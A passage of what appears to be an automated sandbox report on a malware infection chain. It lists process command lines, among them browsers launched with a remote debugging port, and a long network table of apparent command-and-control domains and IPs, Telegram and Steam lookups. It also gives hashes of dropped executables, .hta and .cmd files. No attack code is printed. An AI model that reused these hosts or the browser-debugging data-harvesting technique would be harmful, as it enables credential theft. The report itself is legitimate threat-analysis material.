C:\Users\Admin\AppData\Local\Temp\10097380101\d70b301283.exe

"C:\Users\Admin\AppData\Local\Temp\10097380101\d70b301283.exe"

C:\Users\Admin\AppData\Local\Temp\10097380101\d70b301283.exe

"C:\Users\Admin\AppData\Local\Temp\10097380101\d70b301283.exe"

C:\Users\Admin\AppData\Local\Temp\10097380101\d70b301283.exe

"C:\Users\Admin\AppData\Local\Temp\10097380101\d70b301283.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 5436 -ip 5436

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5436 -s 980

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5240,i,18405729176701668375,10920587458758072120,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4928 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x168,0x16c,0x170,0x144,0x174,0x7ffd9e4746f8,0x7ffd9e474708,0x7ffd9e474718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,4946982620388085778,80995574031800394,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2100 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2076,4946982620388085778,80995574031800394,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2568 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2076,4946982620388085778,80995574031800394,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2920 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,4946982620388085778,80995574031800394,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2596 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2076,4946982620388085778,80995574031800394,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2076,4946982620388085778,80995574031800394,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,4946982620388085778,80995574031800394,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2592 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,4946982620388085778,80995574031800394,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2148 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,4946982620388085778,80995574031800394,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3660 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,4946982620388085778,80995574031800394,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3564 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,4946982620388085778,80995574031800394,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2492 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,4946982620388085778,80995574031800394,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3660 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,4946982620388085778,80995574031800394,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3528 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\10097390101\cc58b24bf3.exe

"C:\Users\Admin\AppData\Local\Temp\10097390101\cc58b24bf3.exe"

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Users\Admin\AppData\Local\Temp\10097400101\5c429c4670.exe

"C:\Users\Admin\AppData\Local\Temp\10097400101\5c429c4670.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffd9e4746f8,0x7ffd9e474708,0x7ffd9e474718

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 150.171.27.10:443 g.bing.com tcp
US 8.8.8.8:53 calmingtefxtures.run udp
US 8.8.8.8:53 foresctwhispers.top udp
US 8.8.8.8:53 tracnquilforest.life udp
US 8.8.8.8:53 presentymusse.world udp
US 8.8.8.8:53 deaddereaste.today udp
US 8.8.8.8:53 subawhipnator.life udp
US 8.8.8.8:53 privileggoe.live udp
US 8.8.8.8:53 boltetuurked.digital udp
US 8.8.8.8:53 pastedeputten.life udp
US 8.8.8.8:53 steamcommunity.com udp
GB 23.214.143.155:443 steamcommunity.com tcp
US 8.8.8.8:53 experimentalideas.today udp
US 172.67.150.33:443 experimentalideas.today tcp
RU 176.113.115.6:80 176.113.115.6 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 172.67.150.33:443 experimentalideas.today tcp
US 172.67.150.33:443 experimentalideas.today tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 172.67.150.33:443 experimentalideas.today tcp
US 172.67.150.33:443 experimentalideas.today tcp
US 172.67.150.33:443 experimentalideas.today tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 8.8.8.8:53 gadgethgfub.icu udp
US 8.8.8.8:53 explorebieology.run udp
US 172.67.179.246:443 explorebieology.run tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 dawtastream.bet udp
US 104.21.13.146:443 dawtastream.bet tcp
US 8.8.8.8:53 circujitstorm.bet udp
US 104.21.28.84:443 circujitstorm.bet tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
N/A 127.0.0.1:59523 tcp
US 8.8.8.8:53 biochextryhub.bet udp
US 172.67.192.128:443 biochextryhub.bet tcp
US 8.8.8.8:53 cobolrationumelawrtewarms.com udp
NL 107.189.27.66:80 cobolrationumelawrtewarms.com tcp
LU 45.59.120.8:80 45.59.120.8 tcp
RU 185.81.68.156:80 185.81.68.156 tcp
DE 5.75.210.149:443 tcp
US 172.67.179.246:443 explorebieology.run tcp
US 172.67.179.246:443 explorebieology.run tcp
US 172.67.179.246:443 explorebieology.run tcp
US 8.8.8.8:53 joyfulhezart.tech udp
US 8.8.8.8:53 hardswarehub.today udp
US 8.8.8.8:53 gadgethgfub.icu udp
US 8.8.8.8:53 hardrwarehaven.run udp
US 8.8.8.8:53 techmindzs.live udp
US 8.8.8.8:53 codxefusion.top udp
US 104.21.69.194:443 codxefusion.top tcp
FR 45.155.103.183:1488 tcp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 su.t.goldenloafuae.com udp
FI 95.217.27.252:443 su.t.goldenloafuae.com tcp
FI 95.217.27.252:443 su.t.goldenloafuae.com tcp
FI 95.217.27.252:443 su.t.goldenloafuae.com tcp
US 8.8.8.8:53 e5.o.lencr.org udp
GB 104.86.110.232:80 e5.o.lencr.org tcp
FI 95.217.27.252:443 su.t.goldenloafuae.com tcp
FI 95.217.27.252:443 su.t.goldenloafuae.com tcp
FI 95.217.27.252:443 su.t.goldenloafuae.com tcp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 dryentaidne.run udp
FI 95.217.27.252:443 su.t.goldenloafuae.com tcp
US 8.8.8.8:53 uncertainyelemz.bet udp
US 8.8.8.8:53 hobbyedsmoker.live udp
US 8.8.8.8:53 dsfljsdfjewf.info udp
US 8.8.8.8:53 deaddereaste.today udp
US 8.8.8.8:53 subawhipnator.life udp
US 8.8.8.8:53 privileggoe.live udp
US 8.8.8.8:53 decreaserid.world udp
US 8.8.8.8:53 pastedeputten.life udp
US 8.8.8.8:53 steamcommunity.com udp
GB 23.214.143.155:443 steamcommunity.com tcp
FI 95.217.27.252:443 su.t.goldenloafuae.com tcp
US 172.67.150.33:443 experimentalideas.today tcp
US 172.67.150.33:443 experimentalideas.today tcp
US 172.67.150.33:443 experimentalideas.today tcp
US 8.8.8.8:53 drunkeflavorz.pw udp
FI 95.217.27.252:443 su.t.goldenloafuae.com tcp
US 172.67.179.246:443 explorebieology.run tcp
FI 135.181.76.95:80 135.181.76.95 tcp
US 172.67.179.246:443 explorebieology.run tcp
FI 95.217.27.252:443 su.t.goldenloafuae.com tcp
US 8.8.8.8:53 www.google.com udp
GB 216.58.204.68:443 www.google.com tcp
US 8.8.8.8:53 ogads-pa.googleapis.com udp
US 8.8.8.8:53 apis.google.com udp
GB 216.58.201.110:443 apis.google.com udp
GB 142.250.200.42:443 ogads-pa.googleapis.com udp
GB 142.250.200.42:443 ogads-pa.googleapis.com tcp
US 8.8.8.8:53 play.google.com udp
GB 142.250.200.46:443 play.google.com udp
GB 142.250.200.46:443 play.google.com tcp
GB 142.250.200.46:443 play.google.com udp
GB 142.250.200.46:443 play.google.com tcp
US 104.21.69.194:443 codxefusion.top tcp
US 104.21.69.194:443 codxefusion.top tcp
US 8.8.8.8:53 clients2.google.com udp
GB 142.250.187.206:443 clients2.google.com udp
GB 142.250.187.206:443 clients2.google.com tcp
US 8.8.8.8:53 clients2.googleusercontent.com udp
GB 142.250.179.225:443 clients2.googleusercontent.com udp
US 172.67.179.246:443 explorebieology.run tcp
US 172.67.179.246:443 explorebieology.run tcp
N/A 224.0.0.251:5353 udp
FI 95.217.27.252:443 su.t.goldenloafuae.com tcp
US 172.67.179.246:443 explorebieology.run tcp
FI 95.217.27.252:443 su.t.goldenloafuae.com tcp
FR 45.155.103.183:1488 tcp
NL 149.154.167.99:443 t.me tcp
FI 95.217.27.252:443 su.t.goldenloafuae.com tcp
FI 95.217.27.252:443 su.t.goldenloafuae.com tcp
FI 95.217.27.252:443 su.t.goldenloafuae.com tcp
FI 95.217.27.252:443 su.t.goldenloafuae.com tcp
FI 95.217.27.252:443 su.t.goldenloafuae.com tcp
FI 95.217.27.252:443 su.t.goldenloafuae.com tcp
RU 176.113.115.7:80 176.113.115.7 tcp
FI 95.217.27.252:443 su.t.goldenloafuae.com tcp
FI 95.217.27.252:443 su.t.goldenloafuae.com tcp
US 172.67.179.246:443 explorebieology.run tcp
US 104.21.69.194:443 codxefusion.top tcp
US 8.8.8.8:53 nw-umwatson.events.data.microsoft.com udp
US 52.168.117.173:443 nw-umwatson.events.data.microsoft.com tcp
US 104.21.69.194:443 codxefusion.top tcp
FI 95.217.27.252:443 su.t.goldenloafuae.com tcp
FI 95.217.27.252:443 su.t.goldenloafuae.com tcp
US 104.21.69.194:443 codxefusion.top tcp
US 52.168.117.173:443 nw-umwatson.events.data.microsoft.com tcp
GB 216.58.204.68:443 www.google.com udp
GB 142.250.200.42:443 ogads-pa.googleapis.com udp
GB 142.250.200.42:443 ogads-pa.googleapis.com tcp
FI 95.217.27.252:443 su.t.goldenloafuae.com tcp
GB 142.250.200.46:443 play.google.com udp
GB 142.250.200.46:443 play.google.com tcp
GB 142.250.200.46:443 play.google.com udp
GB 142.250.200.46:443 play.google.com tcp
FI 95.217.27.252:443 su.t.goldenloafuae.com tcp
FI 95.217.27.252:443 su.t.goldenloafuae.com tcp
RU 176.113.115.7:80 176.113.115.7 tcp
GB 142.250.187.206:443 clients2.google.com udp
GB 142.250.187.206:443 clients2.google.com tcp
GB 142.250.179.225:443 clients2.googleusercontent.com udp
FI 95.217.27.252:443 su.t.goldenloafuae.com tcp
RU 185.81.68.156:80 185.81.68.156 tcp
NL 185.156.73.73:80 185.156.73.73 tcp
US 8.8.8.8:53 exarthynature.run udp
US 104.21.112.1:443 exarthynature.run tcp
US 8.8.8.8:53 www.dropbox.com udp
GB 162.125.64.18:443 www.dropbox.com tcp
FI 95.217.27.252:443 su.t.goldenloafuae.com tcp
US 104.21.112.1:443 exarthynature.run tcp
FI 95.217.27.252:443 su.t.goldenloafuae.com tcp
FI 95.217.27.252:443 su.t.goldenloafuae.com tcp
FI 95.217.27.252:443 su.t.goldenloafuae.com tcp
US 104.21.112.1:443 exarthynature.run tcp
FI 95.217.27.252:443 su.t.goldenloafuae.com tcp
US 104.21.112.1:443 exarthynature.run tcp
US 8.8.8.8:53 nw-umwatson.events.data.microsoft.com udp
US 40.71.93.126:443 nw-umwatson.events.data.microsoft.com tcp
FI 95.217.27.252:443 su.t.goldenloafuae.com tcp
US 104.21.112.1:443 exarthynature.run tcp
FI 95.217.27.252:443 su.t.goldenloafuae.com tcp
FI 95.217.27.252:443 su.t.goldenloafuae.com tcp
FI 95.217.27.252:443 su.t.goldenloafuae.com tcp
US 104.21.13.146:443 dawtastream.bet tcp
US 104.21.13.146:443 dawtastream.bet tcp
US 104.21.112.1:443 exarthynature.run tcp
US 104.21.13.146:443 dawtastream.bet tcp
NL 185.156.73.73:80 185.156.73.73 tcp
FR 45.155.103.183:1488 tcp
FI 95.217.27.252:443 su.t.goldenloafuae.com tcp
US 8.8.8.8:53 decreaserid.world udp
US 8.8.8.8:53 uncertainyelemz.bet udp
US 8.8.8.8:53 hobbyedsmoker.live udp
US 8.8.8.8:53 dsfljsdfjewf.info udp
US 8.8.8.8:53 deaddereaste.today udp
US 8.8.8.8:53 subawhipnator.life udp
US 8.8.8.8:53 privileggoe.live udp
US 8.8.8.8:53 pastedeputten.life udp
US 8.8.8.8:53 steamcommunity.com udp
GB 23.214.143.155:443 steamcommunity.com tcp
FI 95.217.27.252:443 su.t.goldenloafuae.com tcp
US 172.67.150.33:443 experimentalideas.today tcp

Files

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1p75e5.exe

MD5 a92d6465d69430b38cbc16bf1c6a7210
SHA1 421fadebee484c9d19b9cb18faf3b0f5d9b7a554
SHA256 3cdb245eb031230d5652ea5a1160c0cbbb6be92fb3ea3cf2ee14b3d84677fc77
SHA512 0fc65c930a01db8cf306252402c47cf00b1222cd9d9736baf839488cdd6cf96ae8be479e08282ec7f34b665250580466a25cdfc699f4ecef6d5e4d543db8c345

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\2d1728.exe

MD5 75feb5227095b1fdb72953933df3e907
SHA1 82c65fd8b1b296003dea002dd0a640a23063fb23
SHA256 6d4e4eafdd4a46ea7c96557580c7c39f1d850bb0b6ed1ddfaf884ea7b675df65
SHA512 c9406d2e563b34003950a767331c2673d3e823a24c2a713dff33db2c43df818b7dfcfafe6e62794bff6efdddfd9e0e3f3627117148ecdfb182434047c882a418

memory/1064-20-0x0000000000400000-0x000000000070F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10096480101\0e5104c14f.exe

MD5 29dbe0a1208dfedac751f580a83fca87
SHA1 5dba16b31a81c541525a169fd76426e7ae9a04fd
SHA256 bced8cc13d6bccdb3f54e578f084b0d31fb987022d2c5e582f3ba31bb77370f9
SHA512 153ada7a91e0c7841a8f07b43731d07b94307620ee3d45552f1d3c1bcae34b0b29b282bed35a6264a1b2d2d4e9f7fe076e57874a45480232fbd11aac91617d39

C:\Users\Admin\AppData\Local\Temp\YpdF1TCRw.hta

MD5 f2ca693fa01e5efca68231b42d3ccd54
SHA1 ce189980bd70de916338ca37eba0e01f20f61055
SHA256 8f51b1e333d28990eb68e3aa19fc0c6ac0a792ef3ecb572e0822939900c53609
SHA512 fd08c1abac8f766696357f2bba52eb975dabb41b3903f59f3a5810ee7aa77f2353de68741dba79e711de932b19d4fc35fd67bc4043142784292be11e58663da4

memory/1796-62-0x0000000004B60000-0x0000000004B96000-memory.dmp

memory/1796-63-0x00000000051D0000-0x00000000057F8000-memory.dmp

memory/1796-64-0x0000000005160000-0x0000000005182000-memory.dmp

memory/1796-65-0x0000000005A30000-0x0000000005A96000-memory.dmp

memory/1796-66-0x0000000005AA0000-0x0000000005B06000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mqk2h3f5.kg4.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1796-76-0x0000000005B10000-0x0000000005E64000-memory.dmp

memory/1796-77-0x0000000006100000-0x000000000611E000-memory.dmp

memory/1796-78-0x0000000006140000-0x000000000618C000-memory.dmp

memory/1796-91-0x0000000007840000-0x0000000007EBA000-memory.dmp

memory/1796-92-0x0000000006630000-0x000000000664A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10096490121\am_no.cmd

MD5 cedac8d9ac1fbd8d4cfc76ebe20d37f9
SHA1 b0db8b540841091f32a91fd8b7abcd81d9632802
SHA256 5e951726842c371240a6af79d8da7170180f256df94eac5966c07f04ef4d120b
SHA512 ce383ffef8c3c04983e752b7f201b5df2289af057e819cdf7310a55a295790935a70e6a0784a6fd1d6898564a3babab1ffcfbaa0cc0d36e5e042adeb3c293fa5

memory/1064-100-0x0000000000400000-0x000000000070F000-memory.dmp

memory/1796-105-0x00000000075E0000-0x0000000007676000-memory.dmp

memory/1796-106-0x0000000007570000-0x0000000007592000-memory.dmp

memory/1796-107-0x0000000008470000-0x0000000008A14000-memory.dmp

C:\Users\Admin\AppData\Local\TempMA8ZMRP75VZ2NVEVE7VBUYRHP5W8241H.EXE

MD5 0583632fc88b048ba9cb4d837a57dbd4
SHA1 f6ebfff27a31b3663eef08fd455ae19498f3d18d
SHA256 98cd9726241bbfd6fdb239e75c4e1b75f20970f66971f40dfee143618a12bed0
SHA512 5be627b6a51e6ed4102e96c4d8a117ac0c1c26fe6d0da02411b7f3fe60ae6ce4d7805d4b676d78d97612d449c607f9b316e5c6548b17eae4edbfc2f6827dcebe

memory/3968-117-0x0000000000310000-0x00000000007D0000-memory.dmp

memory/3968-119-0x0000000000310000-0x00000000007D0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 25604a2821749d30ca35877a7669dff9
SHA1 49c624275363c7b6768452db6868f8100aa967be
SHA256 7f036b1837d205690b992027eb8b81939ba0228fc296d3f30039eeba00bd4476
SHA512 206d70af0b332208ace2565699f5b5da82b6a3806ffa51dd05f16ab568a887d63449da79bbaeb46183038837446a49515d62cb6615e5c5b27563cd5f774b93f5

memory/4536-130-0x0000000006360000-0x00000000066B4000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 f0f06711cf704eb745187fab5ecedd75
SHA1 8cca816a3e89108b71108bc97ea54db60c158f50
SHA256 fed69d21809f6d5c532746c3443220da5b8a03daf40cd12f97defd091d5c5df7
SHA512 873c18b15ee2937a7d737693d4d070938332b6b54ab2eb753e751498687d3502783841b4329c87394e94d3c92d1dd92670c59ea791f2195d8f0e52b1fb6ffc47

memory/4536-132-0x0000000006E50000-0x0000000006E9C000-memory.dmp

memory/1052-144-0x0000000005670000-0x00000000059C4000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 8e7a304f9de3544af10b8104ef62b965
SHA1 1ac5ef0cb85a194e0c0b944ae12baaa62d3f8254
SHA256 a4d57f3a27d071d166410bc865bdceac64c128e0ae65207504174d853e77d117
SHA512 931c5ee4a86caadb87c52c23c1eb06f0403ecbb75cd4a963178090ca9229b4b72c4dd79fe6deeadcf063792c79c0aece3111189fdacd1fd41691be057b0235f6

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 8c4eee36cd0a767a00b635f649db77fe
SHA1 ff983e2dce6c1fb3202ed6f1058fb34042c50158
SHA256 09430e6a021ad67214419e8569a092d79aafc8a1203b33d58a49f9c02c6f09f5
SHA512 12bea83716d176a2e79236bee2aae012fb1215c58f8ecd7aaeaefd633e15116f4a25e4085c0d6a9bcede47b575a6eddc472cc605f0b3135adb57f3654a592041

C:\Temp\iKyDhmRkP.hta

MD5 39c8cd50176057af3728802964f92d49
SHA1 68fc10a10997d7ad00142fc0de393fe3500c8017
SHA256 f685edf8437c0b505f5e366d8b1cb79e7770361cc4906240e7f8c8ad32c94e84
SHA512 cf563b2b5a3553acf3a91298936b904abf87620c2fc582bcdb45dec5d4b877bef5ae81feae4b741e1aee1a916e543b5f6914d9c494d2aa33bc6f15c6fc904cc6

memory/4532-164-0x00000000056D0000-0x0000000005A24000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e19de410e4a865c1f3261222983631c9
SHA1 1a658b8fefc51c3ed39d19525464da5cbafcfd28
SHA256 8ef4c4073998aab85132266b1ae269e352bba49562fb35eaeeb5d876f10bec95
SHA512 03a2f1799b4749f5ecc7fbea70b20020574525fecef8392ad8a157d4c76517032bcde540f3d94e6d501eba26d8ebaee07a811d2881abb1516e76501e49a5914f

memory/4532-170-0x00000000062E0000-0x000000000632C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10097210101\c71d2df585.exe

MD5 ff9fadae6dcffb10cf0c557cff17e6e5
SHA1 1f0ff025a55226804330bc70c98ef129d7db64d7
